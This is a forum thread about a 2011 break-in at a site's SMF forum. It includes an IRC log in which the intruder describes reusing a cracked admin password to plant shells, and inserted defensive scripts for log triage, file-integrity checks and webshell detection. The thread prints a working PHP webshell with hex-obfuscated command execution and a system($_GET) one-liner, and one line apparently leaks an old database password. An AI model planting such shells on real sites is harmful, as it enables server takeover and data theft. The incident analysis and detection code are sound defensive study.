Regarding the MITB hack

This reminds me of a conversation with super_ right after the ‘hack’, where he asked me if I was going into the ‘Lord of the Rings Online’ business. I had no idea how he could have found this out, because I had just installed them for my brother a few nights before, and he is the one who registered the domain name, so it had nothing to do with me (plus he has 3 members and 0 posts as of now, not exactly busy). Looking back on it, it’s pretty obvious how he found out: if you look in my htdocs folder, there is lotroland.com.

Anyhow, grepping my logs for super_'s IP and filtering out the forum access, he did indeed access the PHP shells and things used to do all of this, so he looks guilty to me. Upon removing his community member status, I found he had given himself access to all of the secret boards on the forum that we have membergroups for as well (nothing major, stuff like Cherokee or Hybridscape developer). Also, the name of his alternate account, ‘slavemaster’, is now ‘veer’; I don’t know if he changed that or another admin did.

So there are mountains of evidence pointing at super_; anyone have any ideas on how it COULDN’T be him?

(I haven’t banned him yet from the forums, but he doesn’t have any status)

edit:
@Wizzup?, I’d recommend you install something like this:
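Added example (editor's, not one of the posts in this thread): the log triage described above, done as a script rather than by hand. It keeps one IP's requests from an Apache combined-format access log, drops ordinary forum browsing and static assets, and flags what is left: PHP files outside the forum's entry points, query keys that look like a shell's command parameter, dump-style commands, and admin panel actions. The IP addresses, paths, timestamps and the `xiao.php` hits in `SAMPLE_LOG` are constructed for the demo, and the SMF entry points and shell query keys are assumptions to adjust for a real site.

```python
"""Apache combined-log triage for one source IP (added example; constructed data)."""
import re
from urllib.parse import unquote

# Combined log format up to the status and size; referer/user-agent may follow.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

FORUM_ENTRY_POINTS = {"/smf/index.php", "/smf/ssi.php"}          # assumed SMF layout
STATIC_EXT = (".css", ".js", ".png", ".gif", ".jpg", ".ico")
CMD_QUERY = re.compile(r'(?:^|&)(?:lol|sh|sys|cmd|c|x)=', re.I)  # assumed shell keys
DUMP_HINT = re.compile(r'mysqldump|\.sql\b|/etc/passwd', re.I)
ADMIN_ACTION = re.compile(r'(?:^|&)action=admin\b')

# Constructed sample: one attacker IP (203.0.113.45), one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.45 - - [05/Sep/2011:03:12:01 +0000] "GET /smf/index.php?board=3.0 HTTP/1.1" 200 8120',
    '203.0.113.45 - - [05/Sep/2011:03:12:05 +0000] "GET /smf/Themes/default/style.css HTTP/1.1" 200 3000',
    '203.0.113.45 - - [05/Sep/2011:03:14:40 +0000] "GET /smf/Themes/default/xiao.php?lol=id HTTP/1.1" 200 88',
    '203.0.113.45 - - [05/Sep/2011:03:15:02 +0000] "POST /smf/Themes/default/xiao.php?x=&sh= HTTP/1.1" 200 512',
    '203.0.113.45 - - [05/Sep/2011:03:16:10 +0000] "GET /smf/Themes/default/xiao.php?lol=mysqldump%20-u%20smf%20smf HTTP/1.1" 200 4096',
    '198.51.100.7 - - [05/Sep/2011:03:16:11 +0000] "GET /smf/index.php?action=login HTTP/1.1" 200 5000',
    '203.0.113.45 - - [05/Sep/2011:03:17:00 +0000] "GET /smf/index.php?action=admin;area=packages HTTP/1.1" 200 9000',
]


def parse(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(lines, ip):
    """Return (timestamp, method, path, reasons) for every suspicious request by `ip`.

    Normal forum browsing (an entry point with an ordinary query) and static
    assets are dropped so that only the requests worth reading remain.
    """
    findings = []
    for line in lines:
        rec = parse(line)
        if rec is None or rec["ip"] != ip:
            continue
        base, _, query = rec["path"].partition("?")
        if base.endswith(STATIC_EXT):
            continue
        reasons = []
        if base.endswith(".php") and base not in FORUM_ENTRY_POINTS:
            reasons.append("php file outside forum entry points")
        if CMD_QUERY.search(query):
            reasons.append("command-style query parameter")
        if DUMP_HINT.search(unquote(query)):
            reasons.append("database dump hint")
        if ADMIN_ACTION.search(query):
            reasons.append("admin panel action")
        if reasons:
            findings.append((rec["ts"], rec["method"], rec["path"], reasons))
    return findings


if __name__ == "__main__":
    for ts, method, path, reasons in triage(SAMPLE_LOG, "203.0.113.45"):
        print(f"{ts} {method} {path}\n    -> {', '.join(reasons)}")
```

On a real box the input would be `grep '^203.0.113.45 ' access.log` piped in, and the admin-panel hits matter as much as the shell hits: they show which admin account's session the attacker was riding, which is where the password reuse discussed later in the thread comes in.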

[quote=“Moparisthebest, post:21, topic:414033”]This reminds me of a conversation with super_ right after the ‘hack’, where he asked me if I was going into the ‘Lord of the Rings Online’ business. I had no idea how he could have found this out, because I had just installed them for my brother a few nights before, and he is the one who registered the domain name, so it had nothing to do with me (plus he has 3 members and 0 posts as of now, not exactly busy). Looking back on it, it’s pretty obvious how he found out: if you look in my htdocs folder, there is lotroland.com.

Anyhow, grepping my logs for super_'s IP and filtering out the forum access, he did indeed access the PHP shells and things used to do all of this, so he looks guilty to me. Upon removing his community member status, I found he had given himself access to all of the secret boards on the forum that we have membergroups for as well (nothing major, stuff like Cherokee or Hybridscape developer). Also, the name of his alternate account, ‘slavemaster’, is now ‘veer’; I don’t know if he changed that or another admin did.

So there are mountains of evidence pointing at super_; anyone have any ideas on how it COULDN’T be him?

(I haven’t banned him yet from the forums, but he doesn’t have any status)

edit:
@Wizzup?, I’d recommend you install something like this:
https://www.moparisthebest.com/smf/index.php/topic,515920.msg3742858.html#new[/quote]A guy called Kevy did it; apparently he uses super_ as a tunnel/proxy. It’s the same guy who got into villavu, and by super_'s own account:
<super_> yea i got into villavu admin panel and made myself have a lot of reps lol

It was “Kevy” who gave him access. Apparently he hasn’t touched this website at all though; that was all this skid. Pretty much what I suspected in the first place.

EDIT: Of course I cannot be 100% certain, but I do trust super_; he’s never lied to me before and I doubt he would start now.

Kevy as in the Rune-Server owner?

[quote=“m.dog311, post:23, topic:414033”]Kevy as in the Rune-Server owner?[/quote]I don’t know. super_ wants to chat with you, mitb; join the channel #seckrit on IRC.

[quote=“Moparisthebest, post:21, topic:414033”]edit:
@Wizzup?, I’d recommend you install something like this:[/quote]

Well, the www-data user had no write permissions at all, so I don’t think anything was changed. But I was indeed looking into something like Tripwire.

Now that I’m back on my desktop, here is the full conversation log I had with ‘kevin’ on the day I was fixing the forums, the only thing I edited out is mopman’s old password:

**** BEGIN LOGGING AT Mon Sep 5 04:27:32 2011

Sep 05 04:27:45 hey kevin you got a minute
Sep 05 04:27:53 huh
Sep 05 04:27:55 what’s up
Sep 05 04:28:15 well, you are the one doing this to the forum judging by your IP, so i’d like to know why, and how
Sep 05 04:28:26 what do you mean
Sep 05 04:28:44 you are the one trying to dump the database and changing my files
Sep 05 04:28:54 i have web server logs and such proving it
Sep 05 04:28:58 it’s nothing personal
Sep 05 04:29:15 so what’s the goal here?
Sep 05 04:29:26 boredom
Sep 05 04:29:42 hehe
Sep 05 04:29:49 care to tell me where the hole is?
Sep 05 04:29:56 yeah
Sep 05 04:30:10 your admins
Sep 05 04:30:31 what about them?
Sep 05 04:30:58 they should be more careful
Sep 05 04:31:20 so you just got an admin password and used that to upload your shell script?
Sep 05 04:31:46 ya
Sep 05 04:32:08 i had a password from an old database
Sep 05 04:32:19 ok, I still don’t understand one more thing though
Sep 05 04:32:32 i had all file permissions set to 500
Sep 05 04:32:47 so after i turned the server back on, how did you edit the last file?
Sep 05 04:32:53 SMF allows you change file permissions
Sep 05 04:32:55 which seems kinda dumb
Sep 05 04:32:57 lol
Sep 05 04:33:21 i was tempted to tell you earlier but i wanted to maintain access
Sep 05 04:33:22 i thought it was only with an ftp server
Sep 05 04:33:32 just in case i needed someone from there who had changed their password
Sep 05 04:33:58 you’re lucky since we could have rooted
Sep 05 04:34:19 but we didn’t think anyone would find out so we left it for a few days
Sep 05 04:34:31 i didn’t notice the syntax error when trying to patch the forum
Sep 05 04:34:40 how would you have gotten root access from only the www-data account?
Sep 05 04:35:03 your httpd was running on mopar account previously
Sep 05 04:35:08 and kernel was vulnerable
Sep 05 04:35:22 it never was, they were just members of the same group
Sep 05 04:35:32 oh
Sep 05 04:35:36 well it was in /home/mopar
Sep 05 04:35:38 so i assumed
Sep 05 04:35:40 not anymore though :slight_smile:
Sep 05 04:35:50 still you couldn’t have used sudo or anything from www-data
Sep 05 04:35:50 and don’t worry about database
Sep 05 04:35:52 it’s in safe hands
Sep 05 04:35:55 and nothing was set-uid
Sep 05 04:35:55 and won’t be posted any where
Sep 05 04:37:16 we only decided to target forum since i came across an old hash i hadn’t bothered to crack
Sep 05 04:37:19 for your admin
Sep 05 04:38:12 algas?
Sep 05 04:38:26 it was either him or mopman
Sep 05 04:38:28 :slight_smile:
Sep 05 04:38:53 mopman
Sep 05 04:38:58 **************** was his password
Sep 05 04:39:01 cracked in no time
Sep 05 04:39:19 what was it? md5 with no salt?
Sep 05 04:39:28 salted MD5
Sep 05 04:39:32 from a vbulletin forum
Sep 05 04:41:22 so did you have any other fun files on there i need to remove? :slight_smile:
Sep 05 04:41:27 nope
Sep 05 04:42:23 so you are either still lying, or you forgot about xiao.php :slight_smile:
Sep 05 04:42:37 i honestly don’t know what that is
Sep 05 04:42:40 lol
Sep 05 04:42:48 it was probably put there by my friend
Sep 05 04:42:48 it was that handy angel script
Sep 05 04:42:54 another copy of it i mean
Sep 05 04:44:09 i considered doing worse stuff to the site since i used to hold a grudge but i felt bad
Sep 05 04:44:13 since it’s only a few users i don’t like
Sep 05 04:44:23 no need to take it out on you and everyone else
Sep 05 04:45:03 so who are you? do you have a site?
Sep 05 04:45:20 i’m kevin and no i don’t have a site
Sep 05 04:45:23 i keep to myself
Sep 05 04:47:49 then why would you have a grudge against the site?
Sep 05 04:48:16 i don’t want to get into that
Sep 05 04:48:54 just curious, there has to be a reason
Sep 05 04:50:10 lol
Sep 05 05:19:34 you gonna put the forums back online?
Sep 05 05:20:00 neat it’s back
Sep 05 05:20:17 don’t forget to change mopman’s pass if you haven’t already
Sep 05 05:20:33 ;p
**** ENDING LOGGING AT Mon Sep 5 05:31:42 2011

Notice how he said he and his ‘friend’ were doing it.

edit:
Here are the logs of super_'s IP accessing the PHP shells and trying to dump the database and such:
http://pastebin.com/Y1L9eKcD
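Added example (editor's, not part of the post above or of Tripwire): the kind of baseline check the post says it was looking into. `build_manifest()` records the SHA-256 and permission bits of every regular file under a web root, and `diff_manifests()` reports files that were added, removed, modified, or re-chmod-ed against a stored baseline. `demo()` builds a throwaway tree and then simulates the sequence the chat log describes: a shell dropped into a theme directory, a 0500 file relaxed to 0755 through the admin panel, and a backdoor appended to it. Every path and file body in `demo()` is constructed; nothing is read from a real server.

```python
"""Tripwire-style baseline check for a web root (added example; constructed data)."""
import hashlib
import os
import stat
import tempfile


def build_manifest(root):
    """Map each regular file under root (relative, '/'-separated) to its hash and mode."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue                          # skip symlinks, sockets, etc.
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = {"sha256": h.hexdigest(), "mode": stat.S_IMODE(st.st_mode)}
    return manifest


def diff_manifests(baseline, current):
    """Compare two manifests; a file can be both modified and mode-changed."""
    report = {"added": [], "removed": [], "modified": [], "mode_changed": []}
    for rel in sorted(set(baseline) | set(current)):
        old, new = baseline.get(rel), current.get(rel)
        if old is None:
            report["added"].append(rel)
        elif new is None:
            report["removed"].append(rel)
        else:
            if old["sha256"] != new["sha256"]:
                report["modified"].append(rel)
            if old["mode"] != new["mode"]:
                report["mode_changed"].append((rel, oct(old["mode"]), oct(new["mode"])))
    return report


def demo():
    """Constructed web root: take a baseline, simulate the intrusion, return the diff."""
    with tempfile.TemporaryDirectory() as root:
        theme_dir = os.path.join(root, "Themes", "default")
        os.makedirs(theme_dir)
        index = os.path.join(root, "index.php")
        with open(index, "w") as f:
            f.write("<?php // forum front controller\n")
        with open(os.path.join(root, "Settings.php"), "w") as f:
            f.write("<?php $db_passwd = 'REDACTED';\n")
        os.chmod(index, 0o500)                    # locked down, as the post describes
        baseline = build_manifest(root)

        # Simulated intrusion: shell dropped, permissions relaxed, file backdoored.
        with open(os.path.join(theme_dir, "xiao.php"), "w") as f:
            f.write("<?php system($_GET['lol']); ?>\n")
        os.chmod(index, 0o755)
        with open(index, "a") as f:
            f.write("<?php system($_GET['lol']); ?>\n")
        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, entries in demo().items():
        print(f"{kind}: {entries}")
```

Two caveats a real deployment needs: the baseline must live somewhere the web server user and the forum admins cannot write (a different host, or a signed file), and the check should run from cron rather than on demand, since the attacker in the log sat on the access for days precisely because nobody was looking.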

s/*/nth8902gdtnoeau/

What’s this for?

Obviously it removed the old database password, but I forgot to remove it from the command. Oh well, it’s old and was only used there anyhow…

Say it again and you will be permanently banned Frell.


So the question is: is TX the ‘friend’ he’s talking about, or is it him using a different alias, or what?

So is this Kevin from Rune-Server, or is it someone unrelated (as he claims)? Also, that’s quite a mountain of evidence against super_…

Also, why does he have somebody tunneling through him? Especially if it’s someone who is capable of doing harm to a site on which he has elevated status. In my opinion that makes super_ at least partially responsible.

Why the hell does everyone point to TX as soon as something bad happens? We all know he’s a skiddie, but he would lack the intelligence to compromise one of our admins or mods…

And Kevin from Rune-Server would have no reason to do something like this.

Really, guys, can we stop pulling a ruler and think before typing?

I assumed that super_ was the ‘friend’, but who knows?

That Kevy is NOT the rune-server owner, they try to make out like he is though. When I found out he wasn’t on IRC the other day, super_ said something like “oh well I thought he was” and tried to brush it off. No idea who he actually is.

I wish I was the owner of google :frowning:

[quote=“Miss Silabsoft, post:32, topic:414033”]Why the hell does everyone point to TX as soon as something bad happens? We all know he’s a skiddie, but he would lack the intelligence to compromise one of our admins or mods…[/quote]Maybe because he told me it was him and did the exact same thing to MY site as well :confused:

But that’s exactly the thing: TX is 99% talk, and if he managed to actually get into your site, you must have had a huge vulnerability such that almost anyone could have done the same thing.

[quote=“Miss Silabsoft, post:37, topic:414033”]But that’s exactly the thing: TX is 99% talk, and if he managed to actually get into your site, you must have had a huge vulnerability such that almost anyone could have done the same thing.[/quote]It’s exactly what happened here. He had access to an admin account, used the theme/package editor to insert a shell into the site he could access (it was something like [tt]system($_GET['lol'])[/tt] or something equally stupid) and other code, and it happened in the same time period as these?

Something like this?

[code]<?php
// Webshell as posted in the thread, with the quoting repaired so it parses.
// The forum stripped the HTML tags from the echo strings; the closing tags
// below are reconstructed, and the <script> that defined encstr() (which
// hex-encodes the textarea contents and submits the hidden form) is gone.
if(isset($_GET['sh'])) {
    echo '';   // the encstr() <script> block originally went here
    echo '<form name="encf" onsubmit="return false;">';
    echo '<textarea name="syst" rows="5" cols="50"></textarea><br>';
    echo '<input value="Execute" onclick="encstr(this.form.syst.value);" type="button"><br>';
    echo '</form>';
    echo '<form name="sysf" method="POST" action="?x=&sh=">';
    echo '<input name="sys" type="hidden" value="">';
    echo '</form>';

    if(isset($_POST['sys'])) {
        $sys = $_POST['sys'];
        $cmd = '';

        // The command arrives hex-encoded (two hex digits per byte), so a
        // plain grep for "system(" or "id" in the POST body would not see it.
        for($i = 0; $i < strlen($sys); $i += 2) {
            $cmd .= chr(hexdec(substr($sys, $i, 2)));
        }

        echo "<h3>[";
        system("whoami");
        echo "@";
        system("hostname");
        echo "] " . $cmd . "</h3>";

        // Run the decoded command in a subshell, folding stderr into the page.
        echo "<p><pre>";
        system("(" . $cmd . ") 2>&1");
        echo "</pre></p>";
    }

    die();
}
[/code]

Yes, that exact code (except it actually WAS ‘get[lol]’ instead of sh). I don’t see how TX would have known where on my site it was (he linked me to the shell, at which point I did a complete search of ALL the files on my web server…), unless he was either working with the guy or did it himself.
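Added example (editor's, not one of the posts): the "complete search of ALL the files on my web server" mentioned above, done as a small static scanner instead of by eye. It walks `.php` files and flags the patterns the two shells in this thread use: a command-execution sink fed straight from request input such as `system($_GET['lol'])`, `eval()` on request input or on a decoder, and the `chr(hexdec(...))` loop that the posted shell uses to hide the command it runs, plus the weaker "sink called with a variable" signal that catches the decoded `$cmd`. The three sample sources below are constructed for the demo (the benign one imitates ordinary SMF theme code that touches `$_GET` without executing anything).

```python
"""Heuristic PHP webshell scanner (added example; constructed samples)."""
import os
import re

SINK = r'(?<![A-Za-z0-9_$])(?:system|exec|passthru|shell_exec|popen|proc_open)\s*\('
REQ = r'\$_(?:GET|POST|REQUEST|COOKIE)\b'

# Ordered strongest first; only the first matching rule is reported per line.
RULES = [
    ("exec-from-request", re.compile(SINK + r'\s*' + REQ)),
    ("eval-from-request", re.compile(r'(?<![A-Za-z0-9_$])eval\s*\(.*' + REQ)),
    ("obfuscated-eval", re.compile(
        r'(?<![A-Za-z0-9_$])eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(')),
    ("hex-decode-loop", re.compile(r'chr\s*\(\s*hexdec\s*\(')),
    ("exec-with-variable", re.compile(SINK + r'[^;]*\$')),
]

# Constructed samples.
SHELL_ONELINER = "<?php system($_GET['lol']); ?>"

SHELL_HEX = """<?php
if (isset($_POST['sys'])) {
    $sys = $_POST['sys'];
    $cmd = '';
    for ($i = 0; $i < strlen($sys); $i += 2) {
        $cmd .= chr(hexdec(substr($sys, $i, 2)));
    }
    system("(" . $cmd . ") 2>&1");
}
"""

BENIGN = """<?php
// Imitation of ordinary theme code: reads the request, never executes it.
$board = isset($_GET['board']) ? (int) $_GET['board'] : 0;
$request = $smcFunc['db_query']('', 'SELECT name FROM {db_prefix}boards WHERE id_board = {int:board}',
    array('board' => $board));
echo htmlspecialchars($context['system_message']);
"""


def scan_source(src):
    """Return (line number, rule name, stripped line) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((lineno, name, line.strip()))
                break
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                found = scan_source(fh.read())
            if found:
                hits[path] = found
    return hits


if __name__ == "__main__":
    for label, src in (("oneliner", SHELL_ONELINER), ("hex shell", SHELL_HEX), ("benign", BENIGN)):
        print(label, scan_source(src))
```

This is a triage aid, not proof of absence: a shell hidden with `$f = 'sys' . 'tem'; $f($c)` or stashed in a `.phtml`, `.inc` or `.htaccess`-mapped extension slips past these rules, which is why the scan belongs beside a hash baseline rather than in place of one.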